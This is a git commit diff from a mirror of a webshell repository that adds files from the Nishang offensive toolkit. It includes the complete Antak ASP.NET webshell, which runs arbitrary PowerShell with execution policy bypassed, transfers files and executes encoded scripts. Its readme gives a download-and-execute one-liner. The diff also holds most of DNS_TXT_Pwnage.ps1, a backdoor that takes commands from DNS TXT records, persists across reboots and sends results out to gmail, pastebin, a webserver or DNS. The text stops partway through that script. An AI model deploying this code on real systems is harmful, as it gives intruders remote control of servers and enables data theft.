mirror of
https://github.com/tennc/webshell
synced 2024-11-25 12:40:17 +00:00
update Antak-WebShell aspx
Antak-WebShell
This commit is contained in:
parent
c77a9dad29
commit
300ccb3c8d
48 changed files with 9705 additions and 0 deletions
22
aspx/nishang/.gitattributes
vendored
Normal file
22
aspx/nishang/.gitattributes
vendored
Normal file
|
@ -0,0 +1,22 @@
|
||||||
|
# Auto detect text files and perform LF normalization
|
||||||
|
* text=auto
|
||||||
|
|
||||||
|
# Custom for Visual Studio
|
||||||
|
*.cs diff=csharp
|
||||||
|
*.sln merge=union
|
||||||
|
*.csproj merge=union
|
||||||
|
*.vbproj merge=union
|
||||||
|
*.fsproj merge=union
|
||||||
|
*.dbproj merge=union
|
||||||
|
|
||||||
|
# Standard to msysgit
|
||||||
|
*.doc diff=astextplain
|
||||||
|
*.DOC diff=astextplain
|
||||||
|
*.docx diff=astextplain
|
||||||
|
*.DOCX diff=astextplain
|
||||||
|
*.dot diff=astextplain
|
||||||
|
*.DOT diff=astextplain
|
||||||
|
*.pdf diff=astextplain
|
||||||
|
*.PDF diff=astextplain
|
||||||
|
*.rtf diff=astextplain
|
||||||
|
*.RTF diff=astextplain
|
218
aspx/nishang/.gitignore
vendored
Normal file
218
aspx/nishang/.gitignore
vendored
Normal file
|
@ -0,0 +1,218 @@
|
||||||
|
#################
|
||||||
|
## Eclipse
|
||||||
|
#################
|
||||||
|
|
||||||
|
*.pydevproject
|
||||||
|
.project
|
||||||
|
.metadata
|
||||||
|
bin/
|
||||||
|
tmp/
|
||||||
|
*.tmp
|
||||||
|
*.bak
|
||||||
|
*.swp
|
||||||
|
*~.nib
|
||||||
|
local.properties
|
||||||
|
.classpath
|
||||||
|
.settings/
|
||||||
|
.loadpath
|
||||||
|
|
||||||
|
# External tool builders
|
||||||
|
.externalToolBuilders/
|
||||||
|
|
||||||
|
# Locally stored "Eclipse launch configurations"
|
||||||
|
*.launch
|
||||||
|
|
||||||
|
# CDT-specific
|
||||||
|
.cproject
|
||||||
|
|
||||||
|
# PDT-specific
|
||||||
|
.buildpath
|
||||||
|
|
||||||
|
|
||||||
|
#################
|
||||||
|
## Visual Studio
|
||||||
|
#################
|
||||||
|
|
||||||
|
## Ignore Visual Studio temporary files, build results, and
|
||||||
|
## files generated by popular Visual Studio add-ons.
|
||||||
|
|
||||||
|
# User-specific files
|
||||||
|
*.suo
|
||||||
|
*.user
|
||||||
|
*.sln.docstates
|
||||||
|
|
||||||
|
# Build results
|
||||||
|
|
||||||
|
[Dd]ebug/
|
||||||
|
[Rr]elease/
|
||||||
|
x64/
|
||||||
|
build/
|
||||||
|
[Bb]in/
|
||||||
|
[Oo]bj/
|
||||||
|
|
||||||
|
# MSTest test Results
|
||||||
|
[Tt]est[Rr]esult*/
|
||||||
|
[Bb]uild[Ll]og.*
|
||||||
|
|
||||||
|
*_i.c
|
||||||
|
*_p.c
|
||||||
|
*.ilk
|
||||||
|
*.meta
|
||||||
|
*.obj
|
||||||
|
*.pch
|
||||||
|
*.pdb
|
||||||
|
*.pgc
|
||||||
|
*.pgd
|
||||||
|
*.rsp
|
||||||
|
*.sbr
|
||||||
|
*.tlb
|
||||||
|
*.tli
|
||||||
|
*.tlh
|
||||||
|
*.tmp
|
||||||
|
*.tmp_proj
|
||||||
|
*.log
|
||||||
|
*.vspscc
|
||||||
|
*.vssscc
|
||||||
|
.builds
|
||||||
|
*.pidb
|
||||||
|
*.log
|
||||||
|
*.scc
|
||||||
|
|
||||||
|
# Visual C++ cache files
|
||||||
|
ipch/
|
||||||
|
*.aps
|
||||||
|
*.ncb
|
||||||
|
*.opensdf
|
||||||
|
*.sdf
|
||||||
|
*.cachefile
|
||||||
|
|
||||||
|
# Visual Studio profiler
|
||||||
|
*.psess
|
||||||
|
*.vsp
|
||||||
|
*.vspx
|
||||||
|
|
||||||
|
# Guidance Automation Toolkit
|
||||||
|
*.gpState
|
||||||
|
|
||||||
|
# ReSharper is a .NET coding add-in
|
||||||
|
_ReSharper*/
|
||||||
|
*.[Rr]e[Ss]harper
|
||||||
|
|
||||||
|
# TeamCity is a build add-in
|
||||||
|
_TeamCity*
|
||||||
|
|
||||||
|
# DotCover is a Code Coverage Tool
|
||||||
|
*.dotCover
|
||||||
|
|
||||||
|
# NCrunch
|
||||||
|
*.ncrunch*
|
||||||
|
.*crunch*.local.xml
|
||||||
|
|
||||||
|
# Installshield output folder
|
||||||
|
[Ee]xpress/
|
||||||
|
|
||||||
|
# DocProject is a documentation generator add-in
|
||||||
|
DocProject/buildhelp/
|
||||||
|
DocProject/Help/*.HxT
|
||||||
|
DocProject/Help/*.HxC
|
||||||
|
DocProject/Help/*.hhc
|
||||||
|
DocProject/Help/*.hhk
|
||||||
|
DocProject/Help/*.hhp
|
||||||
|
DocProject/Help/Html2
|
||||||
|
DocProject/Help/html
|
||||||
|
|
||||||
|
# Click-Once directory
|
||||||
|
publish/
|
||||||
|
|
||||||
|
# Publish Web Output
|
||||||
|
*.Publish.xml
|
||||||
|
*.pubxml
|
||||||
|
|
||||||
|
# NuGet Packages Directory
|
||||||
|
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
|
||||||
|
#packages/
|
||||||
|
|
||||||
|
# Windows Azure Build Output
|
||||||
|
csx
|
||||||
|
*.build.csdef
|
||||||
|
|
||||||
|
# Windows Store app package directory
|
||||||
|
AppPackages/
|
||||||
|
|
||||||
|
# Others
|
||||||
|
sql/
|
||||||
|
*.Cache
|
||||||
|
ClientBin/
|
||||||
|
[Ss]tyle[Cc]op.*
|
||||||
|
~$*
|
||||||
|
*~
|
||||||
|
*.dbmdl
|
||||||
|
*.[Pp]ublish.xml
|
||||||
|
*.pfx
|
||||||
|
*.publishsettings
|
||||||
|
|
||||||
|
# RIA/Silverlight projects
|
||||||
|
Generated_Code/
|
||||||
|
|
||||||
|
# Backup & report files from converting an old project file to a newer
|
||||||
|
# Visual Studio version. Backup files are not needed, because we have git ;-)
|
||||||
|
_UpgradeReport_Files/
|
||||||
|
Backup*/
|
||||||
|
UpgradeLog*.XML
|
||||||
|
UpgradeLog*.htm
|
||||||
|
|
||||||
|
# SQL Server files
|
||||||
|
App_Data/*.mdf
|
||||||
|
App_Data/*.ldf
|
||||||
|
|
||||||
|
#############
|
||||||
|
## Windows detritus
|
||||||
|
#############
|
||||||
|
|
||||||
|
# Windows image file caches
|
||||||
|
Thumbs.db
|
||||||
|
ehthumbs.db
|
||||||
|
|
||||||
|
# Folder config file
|
||||||
|
Desktop.ini
|
||||||
|
|
||||||
|
# Recycle Bin used on file shares
|
||||||
|
$RECYCLE.BIN/
|
||||||
|
|
||||||
|
# Mac crap
|
||||||
|
.DS_Store
|
||||||
|
|
||||||
|
|
||||||
|
#############
|
||||||
|
## Python
|
||||||
|
#############
|
||||||
|
|
||||||
|
*.py[co]
|
||||||
|
|
||||||
|
# Packages
|
||||||
|
*.egg
|
||||||
|
*.egg-info
|
||||||
|
dist/
|
||||||
|
build/
|
||||||
|
eggs/
|
||||||
|
parts/
|
||||||
|
var/
|
||||||
|
sdist/
|
||||||
|
develop-eggs/
|
||||||
|
.installed.cfg
|
||||||
|
|
||||||
|
# Installer logs
|
||||||
|
pip-log.txt
|
||||||
|
|
||||||
|
# Unit test / coverage reports
|
||||||
|
.coverage
|
||||||
|
.tox
|
||||||
|
|
||||||
|
#Translations
|
||||||
|
*.mo
|
||||||
|
|
||||||
|
#Mr Developer
|
||||||
|
.mr.developer.cfg
|
||||||
|
|
||||||
|
#TODO
|
||||||
|
TODO.txt
|
33
aspx/nishang/Antak-WebShell/Readme.md
Normal file
33
aspx/nishang/Antak-WebShell/Readme.md
Normal file
|
@ -0,0 +1,33 @@
|
||||||
|
Antak is a webshell written in ASP.Net which utilizes powershell.
|
||||||
|
Antak is a part of Nishang and updates could be found here:
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
|
||||||
|
while using commands (like changing current directory or running session aware scripts).
|
||||||
|
|
||||||
|
Executing PowerShell scripts on the target -
|
||||||
|
|
||||||
|
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
|
||||||
|
|
||||||
|
2. Use powershell one-liner (example below) for download & execute in the command box.
|
||||||
|
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
|
||||||
|
|
||||||
|
3. By uploading the script to the target and executing it.
|
||||||
|
|
||||||
|
4. Make the script a semi-colon separated one-liner.
|
||||||
|
|
||||||
|
|
||||||
|
Files can be uploaded and downloaded using the respective buttons.
|
||||||
|
|
||||||
|
Uploading a file -
|
||||||
|
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
|
||||||
|
(OS temporary directory like C:\Windows\Temp may be writable.)
|
||||||
|
Then use Browse and Upload buttons to upload file to that path.
|
||||||
|
|
||||||
|
Downloading a file -
|
||||||
|
To download a file enter the actual path on the server in command textbox.
|
||||||
|
Then click on Download button.
|
||||||
|
|
||||||
|
|
||||||
|
A detailed blog post on Antak could be found here
|
||||||
|
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
|
196
aspx/nishang/Antak-WebShell/antak.aspx
Normal file
196
aspx/nishang/Antak-WebShell/antak.aspx
Normal file
|
@ -0,0 +1,196 @@
|
||||||
|
<%@ Page Language="C#" Debug="true" Trace="false" %>
|
||||||
|
<%@ Import Namespace="System.Diagnostics" %>
|
||||||
|
<%@ Import Namespace="System.IO" %>
|
||||||
|
<%@ Import Namespace="System.IO.Compression" %>
|
||||||
|
|
||||||
|
<%--Antak - A Webshell which utilizes powershell.--%>
|
||||||
|
|
||||||
|
<script Language="c#" runat="server">
|
||||||
|
protected override void OnInit(EventArgs e)
|
||||||
|
{
|
||||||
|
output.Text = @"Welcome to Antak - A Webshell in Powershell
|
||||||
|
Use help for more details.
|
||||||
|
Use clear to clear the screen.";
|
||||||
|
}
|
||||||
|
string do_ps(string arg)
|
||||||
|
{
|
||||||
|
//This section based on cmdasp webshell by http://michaeldaw.org
|
||||||
|
ProcessStartInfo psi = new ProcessStartInfo();
|
||||||
|
psi.FileName = "powershell.exe";
|
||||||
|
psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
|
||||||
|
psi.RedirectStandardOutput = true;
|
||||||
|
psi.UseShellExecute = false;
|
||||||
|
Process p = Process.Start(psi);
|
||||||
|
StreamReader stmrdr = p.StandardOutput;
|
||||||
|
string s = stmrdr.ReadToEnd();
|
||||||
|
stmrdr.Close();
|
||||||
|
return s;
|
||||||
|
}
|
||||||
|
|
||||||
|
void ps(object sender, System.EventArgs e)
|
||||||
|
{
|
||||||
|
string option = console.Text.ToLower();
|
||||||
|
if (option.Equals("help"))
|
||||||
|
{
|
||||||
|
output.Text = @"Use this shell as a normal powershell console. Each command is executed in a new process, keep this in mind
|
||||||
|
while using commands (like changing current directory or running session aware scripts).
|
||||||
|
|
||||||
|
Executing PowerShell scripts on the target -
|
||||||
|
1. Paste the script in command textbox and click 'Encode and Execute'. A reasonably large script could be executed using this.
|
||||||
|
|
||||||
|
2. Use powershell one-liner (example below) for download & execute in the command box.
|
||||||
|
IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
|
||||||
|
|
||||||
|
3. By uploading the script to the target and executing it.
|
||||||
|
|
||||||
|
4. Make the script a semi-colon separated one-liner.
|
||||||
|
|
||||||
|
|
||||||
|
Files can be uploaded and downloaded using the respective buttons.
|
||||||
|
|
||||||
|
Uploading a file -
|
||||||
|
To upload a file you must mention the actual path on server (with write permissions) in command textbox.
|
||||||
|
(OS temporary directory like C:\Windows\Temp may be writable.)
|
||||||
|
Then use Browse and Upload buttons to upload file to that path.
|
||||||
|
|
||||||
|
Downloading a file -
|
||||||
|
To download a file enter the actual path on the server in command textbox.
|
||||||
|
Then click on Download button.
|
||||||
|
|
||||||
|
Antak is a part of Nishang and updates could be found here:
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
A detailed blog post on Antak could be found here
|
||||||
|
http://www.labofapenetrationtester.com/2014/06/introducing-antak.html
|
||||||
|
|
||||||
|
";
|
||||||
|
console.Text = string.Empty;
|
||||||
|
console.Focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
else if (option.Equals("clear"))
|
||||||
|
{
|
||||||
|
output.Text = string.Empty;
|
||||||
|
console.Text = string.Empty;
|
||||||
|
console.Focus();
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
output.Text += "\nPS> " + console.Text + "\n" + do_ps(console.Text);
|
||||||
|
console.Text = string.Empty;
|
||||||
|
console.Focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
void execcommand(string cmd)
|
||||||
|
{
|
||||||
|
output.Text += "PS> " + "\n" + do_ps(cmd);
|
||||||
|
console.Text = string.Empty;
|
||||||
|
console.Focus();
|
||||||
|
}
|
||||||
|
|
||||||
|
void base64encode(object sender, System.EventArgs e)
|
||||||
|
{
|
||||||
|
// Compression and encoding directly stolen from Compress-PostScript by Carlos Perez
|
||||||
|
//http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
|
||||||
|
|
||||||
|
string contents = console.Text;
|
||||||
|
// Compress Script
|
||||||
|
|
||||||
|
|
||||||
|
MemoryStream ms = new MemoryStream();
|
||||||
|
|
||||||
|
DeflateStream cs = new DeflateStream(ms, CompressionMode.Compress);
|
||||||
|
|
||||||
|
StreamWriter sw = new StreamWriter(cs, ASCIIEncoding.ASCII);
|
||||||
|
|
||||||
|
sw.WriteLine(contents);
|
||||||
|
|
||||||
|
sw.Close();
|
||||||
|
|
||||||
|
string code = Convert.ToBase64String(ms.ToArray());
|
||||||
|
|
||||||
|
string command = "Invoke-Expression $(New-Object IO.StreamReader (" +
|
||||||
|
|
||||||
|
"$(New-Object IO.Compression.DeflateStream (" +
|
||||||
|
|
||||||
|
"$(New-Object IO.MemoryStream (," +
|
||||||
|
|
||||||
|
"$([Convert]::FromBase64String('" + code + "')))), " +
|
||||||
|
|
||||||
|
"[IO.Compression.CompressionMode]::Decompress))," +
|
||||||
|
|
||||||
|
" [Text.Encoding]::ASCII)).ReadToEnd();";
|
||||||
|
|
||||||
|
execcommand(command);
|
||||||
|
|
||||||
|
|
||||||
|
}
|
||||||
|
protected void uploadbutton_Click(object sender, EventArgs e)
|
||||||
|
{
|
||||||
|
if (upload.HasFile)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
string filename = Path.GetFileName(upload.FileName);
|
||||||
|
upload.SaveAs(console.Text + "\\" + filename);
|
||||||
|
output.Text = "File uploaded to: " + console.Text + "\\" + filename;
|
||||||
|
}
|
||||||
|
catch (Exception ex)
|
||||||
|
{
|
||||||
|
output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
protected void downloadbutton_Click(object sender, EventArgs e)
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
Response.ContentType = "application/octet-stream";
|
||||||
|
|
||||||
|
Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text);
|
||||||
|
|
||||||
|
Response.TransmitFile(console.Text);
|
||||||
|
|
||||||
|
Response.End();
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
catch (Exception ex)
|
||||||
|
{
|
||||||
|
output.Text = ex.ToString();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
</script>
|
||||||
|
<HTML>
|
||||||
|
<HEAD>
|
||||||
|
<title>Antak Webshell</title>
|
||||||
|
</HEAD>
|
||||||
|
<body bgcolor="#808080">
|
||||||
|
<div>
|
||||||
|
<form id="Form1" method="post" runat="server" style="background-color: #808080">
|
||||||
|
<div style="text-align:center; resize:vertical">
|
||||||
|
<asp:TextBox ID="output" runat="server" TextMode="MultiLine" BackColor="#012456" ForeColor="White" style="height: 526px; width: 891px;" ReadOnly="True"></asp:TextBox>
|
||||||
|
<asp:TextBox ID="console" runat="server" BackColor="#012456" ForeColor="Yellow" Width="891px" TextMode="MultiLine" Rows="1" onkeydown="if(event.keyCode == 13) document.getElementById('cmd').click()" Height="23px" AutoCompleteType="None"></asp:TextBox>
|
||||||
|
|
||||||
|
|
||||||
|
</div>
|
||||||
|
<div style="width: 1100px; text-align:center">
|
||||||
|
<asp:Button ID="cmd" runat="server" Text="Submit" OnClick="ps" />
|
||||||
|
<asp:FileUpload ID="upload" runat="server"/>
|
||||||
|
<asp:Button ID="uploadbutton" runat="server" Text="Upload the File" OnClick="uploadbutton_Click" />
|
||||||
|
<asp:Button ID="encode" runat="server" Text="Encode and Execute" OnClick="base64encode" />
|
||||||
|
<asp:Button ID="downloadbutton" runat="server" Text="Download" OnClick="downloadbutton_Click" />
|
||||||
|
</div>
|
||||||
|
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
</div>
|
||||||
|
</body>
|
||||||
|
</HTML>
|
393
aspx/nishang/Backdoors/DNS_TXT_Pwnage.ps1
Normal file
393
aspx/nishang/Backdoors/DNS_TXT_Pwnage.ps1
Normal file
|
@ -0,0 +1,393 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Payload which acts as a backdoor and is capable of recieving commands and PowerShell scripts from DNS TXT queries.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload continuously queries a subdomain's TXT records. It could be sent commands and powershell scripts to be
|
||||||
|
executed on the target machine by TXT messages of a domain. The powershell scripts which would be served as TXT record
|
||||||
|
MUST be encoded using Invoke-Encode.ps1 in the utility folder.
|
||||||
|
If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode.
|
||||||
|
|
||||||
|
.PARAMETER startdomain
|
||||||
|
The domain (or subdomain) whose TXT records would be checked regularly for further instructions.
|
||||||
|
|
||||||
|
.PARAMETER cmdstring
|
||||||
|
The string, if responded by TXT record of startdomain, will make the payload query "commanddomain" for commands.
|
||||||
|
|
||||||
|
.PARAMETER commanddomain
|
||||||
|
The domain (or subdomain) whose TXT records would be used to issue commands to the payload.
|
||||||
|
|
||||||
|
.PARAMETER psstring
|
||||||
|
The string, if responded by TXT record of startdomain, will make the payload query "psdomain" for encoded powershell script.
|
||||||
|
|
||||||
|
.PARAMETER psdomain
|
||||||
|
The domain (or subdomain) which would be used to provide powershell scripts from its TXT records.
|
||||||
|
|
||||||
|
.PARAMETER stopstring
|
||||||
|
The string, if responded by TXT record of startdomain, will stop this payload on the target.
|
||||||
|
|
||||||
|
.PARAMETER AUTHNS
|
||||||
|
Authoritative Name Server for the domains (or startdomain in case you are using separate domains). Startdomain
|
||||||
|
would be changed for commands and an authoritative reply shoudl reflect changes immediately.
|
||||||
|
|
||||||
|
.PARAMETER exfil
|
||||||
|
Use this option for using exfiltration
|
||||||
|
|
||||||
|
.PARAMETER ExfilOption
|
||||||
|
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
|
||||||
|
|
||||||
|
.PARAMETER dev_key
|
||||||
|
The Unique API key provided by pastebin when you register a free account.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER username
|
||||||
|
Username for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER password
|
||||||
|
Password for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL of the webserver where POST requests would be sent.
|
||||||
|
|
||||||
|
.PARAMETER DomainName
|
||||||
|
The DomainName, whose subdomains would be used for sending TXT queries to.
|
||||||
|
|
||||||
|
.PARAMETER ExfilNS
|
||||||
|
Authoritative Name Server for the domain specified in DomainName.
|
||||||
|
|
||||||
|
.PARAMETER persist
|
||||||
|
Use this parameter for reboot persistence
|
||||||
|
|
||||||
|
.PARAMETER NoLoadFunction
|
||||||
|
This parameter is used for specifying that the script used in txt records $psdomain does NOT contain a function.
|
||||||
|
If the parameter is not specified the payload assumes that the script pulled from txt records would need function name to be executed.
|
||||||
|
This would be the case if you are using Nishang scripts with this backdoor.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > DNS_TXT_Pwnage
|
||||||
|
The payload will ask for all required options.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > DNS_TXT_Pwnage start.alteredsecurity.com begincommands command.alteredsecurity.com startscript encscript.alteredsecurity.com stop ns8.zoneedit.com
|
||||||
|
In the above example if you want to execute commands. TXT record of start.alteredsecurity.com
|
||||||
|
must contain only "begincommands" and command.alteredsecurity.com should conatin a single command
|
||||||
|
you want to execute. The TXT record could be changed live and the payload will pick up updated
|
||||||
|
record to execute new command.
|
||||||
|
|
||||||
|
To execute a script in above example, start.alteredsecurity.com must contain "startscript". As soon it matches, the payload will query
|
||||||
|
psdomain looking for a base64encoded powershell script. Use the StringToBase64 function to encode scripts to base64.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > DNS_TXT_Pwnage start.alteredsecurity.com begincommands command.alteredsecurity.com startscript encscript.alteredsecurity.com stop ns8.zoneedit.com -exfil -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
|
||||||
|
Use above command for using sending POST request to your webserver which is able to log the requests.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > DNS_TXT_Pwnage -persist
|
||||||
|
Use above for reboot persistence.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function DNS_TXT_Pwnage
|
||||||
|
{
|
||||||
|
[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$persist,
|
||||||
|
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$exfil,
|
||||||
|
|
||||||
|
[Parameter(Parametersetname="exfil")]
|
||||||
|
[Switch]
|
||||||
|
$NoLoadFunction,
|
||||||
|
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$startdomain,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$cmdstring,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$commanddomain,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$psstring,
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$psdomain,
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 5, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]
|
||||||
|
$StopString,
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $True, Parametersetname="exfil")]
|
||||||
|
[Parameter(Position = 6, Mandatory = $True, Parametersetname="noexfil")]
|
||||||
|
[String]$AuthNS,
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$dev_key = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$username = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$password = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$URL = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 12, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$DomainName = "null",
|
||||||
|
|
||||||
|
[Parameter(Position = 13, Mandatory = $False, Parametersetname="exfil")]
|
||||||
|
[String]
|
||||||
|
$ExfilNS = "null"
|
||||||
|
|
||||||
|
)
|
||||||
|
|
||||||
|
$body = @'
|
||||||
|
function DNS-TXT-Logic ($Startdomain, $cmdstring, $commanddomain, $psstring, $psdomain, $Stopstring, $AuthNS, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $ExfilNS, $exfil, $LoadFunction)
|
||||||
|
{
|
||||||
|
while($true)
|
||||||
|
{
|
||||||
|
$exec = 0
|
||||||
|
start-sleep -seconds 5
|
||||||
|
$getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain $AuthNS")
|
||||||
|
$tmp = $getcode | select-string -pattern "`""
|
||||||
|
$startcode = $tmp -split("`"")[0]
|
||||||
|
if ($startcode[1] -eq $cmdstring)
|
||||||
|
{
|
||||||
|
start-sleep -seconds 5
|
||||||
|
$getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain $AuthNS")
|
||||||
|
$temp = $getcommand | select-string -pattern "`""
|
||||||
|
$command = $temp -split("`"")[0]
|
||||||
|
$pastevalue = Invoke-Expression $command[1]
|
||||||
|
$pastevalue
|
||||||
|
$exec++
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
|
||||||
|
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
|
||||||
|
}
|
||||||
|
if ($exec -eq 1)
|
||||||
|
{
|
||||||
|
Start-Sleep -Seconds 60
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($startcode[1] -match $psstring)
|
||||||
|
{
|
||||||
|
|
||||||
|
$getcommand = (Invoke-Expression "nslookup -querytype=txt $psdomain $AuthNS")
|
||||||
|
$temp = $getcommand | select-string -pattern "`""
|
||||||
|
$tmp1 = ""
|
||||||
|
foreach ($txt in $temp)
|
||||||
|
{
|
||||||
|
$tmp1 = $tmp1 + $txt
|
||||||
|
}
|
||||||
|
$encdata = $tmp1 -replace '\s+', "" -replace "`"", ""
|
||||||
|
#Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
|
||||||
|
$dec = [System.Convert]::FromBase64String($encdata)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$ms.Write($dec, 0, $dec.Length)
|
||||||
|
$ms.Seek(0,0) | Out-Null
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
|
||||||
|
$sr = New-Object System.IO.StreamReader($cs)
|
||||||
|
$command = $sr.readtoend()
|
||||||
|
# Check for the function loaded by the script.
|
||||||
|
$preloading = Get-ChildItem function:\
|
||||||
|
Invoke-Expression $command
|
||||||
|
$postloading = Get-ChildItem function:\
|
||||||
|
$diffobj = Compare-Object $preloading $postloading
|
||||||
|
$FunctionName = $diffobj.InputObject.Name
|
||||||
|
$pastevalue = Invoke-Expression $FunctionName
|
||||||
|
if ($NoLoadFunction -eq $True)
|
||||||
|
{
|
||||||
|
$pastevalue = Invoke-Expression $command
|
||||||
|
}
|
||||||
|
$pastevalue
|
||||||
|
$exec++
|
||||||
|
if ($exfil -eq $True)
|
||||||
|
{
|
||||||
|
$pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
|
||||||
|
Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
|
||||||
|
}
|
||||||
|
if ($exec -eq 1)
|
||||||
|
{
|
||||||
|
Start-Sleep -Seconds 60
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if($startcode[1] -eq $StopString)
|
||||||
|
{
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
|
||||||
|
$exfiltration = @'
|
||||||
|
function Do-Exfiltration($pastename,$pastevalue,$ExfilOption,$dev_key,$username,$password,$URL,$DomainName,$ExfilNS)
|
||||||
|
{
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:session_key=$http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
function Compress-Encode
|
||||||
|
{
|
||||||
|
